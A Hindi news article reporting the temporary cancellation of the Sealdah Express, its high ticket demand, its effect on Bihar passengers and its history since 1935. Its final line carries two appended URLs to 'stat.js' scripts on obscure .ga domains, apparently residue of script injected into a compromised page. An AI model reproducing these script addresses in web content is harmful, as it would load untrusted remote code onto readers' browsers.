रेलवे के चीफ प्रोग्राम मैनेजर केन चंद्रा ने पूर्व एवं मध्य रेलवे को एक पत्र भेजा है. जिससे बिहारवासियों को बड़ा झटका लगा है. पत्र में लिखा है कि अप एवं डाउन सियालदह एक्सप्रेस को अस्थाई रूप से रद्द कर दिया गया है. इस ट्रेन का परिचालन रद्द होने से रेलवे के सोनपुर एवं समस्तीपुर मंडल को भारी नुकसान होगा।
अब सीतामढ़ी से सोनपुर समस्तीपुर मंडल के नारायणपुर अनंत, सिलौट, सिहो ढोली दुबहा कपूरीग्राम व अन्य छोटे स्टेशनों पर ठहराव लेटे हुए यह ट्रेन सियालदाह तक को जाती थी। जिसे आज अस्थाई रूप से अब रद्द कर दिया गया है।
सोचने वाली बात यह है कि रेलवे के अनुसार इस ट्रेन की टिकटों का डिमांड औसतन 157 फीसद हमेशा रहा है। ट्रेन नंबर 13120 आनंद विहार टर्मिनल से सियालदह तक चलने वाली ट्रेन के टिकटों की मांग 171 फीसद रहता है। इतने अच्छे डिमांड और टिकटों की बुकिंग के बावजूद इस ट्रेन को हमेशा के लिए रद्द करने का फैसला आखिर क्यों लिया गया है।
इस फैसले से बिहार के लाखों यात्रियों को एक नई मुसीबत का सामना करना पड़ेगा। बता दें कि यह ट्रेन पहली बार अंग्रेजों के शासनकाल में 1935 में हावड़ा से दिल्ली के बीच चलाई गई थी उसके बाद 1990 में ट्रेन का नंबर बदल कर इसमें स्लीपर फर्स्ट क्लास कोच और जनरल कोच के साथ चलाई जाने लगी।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms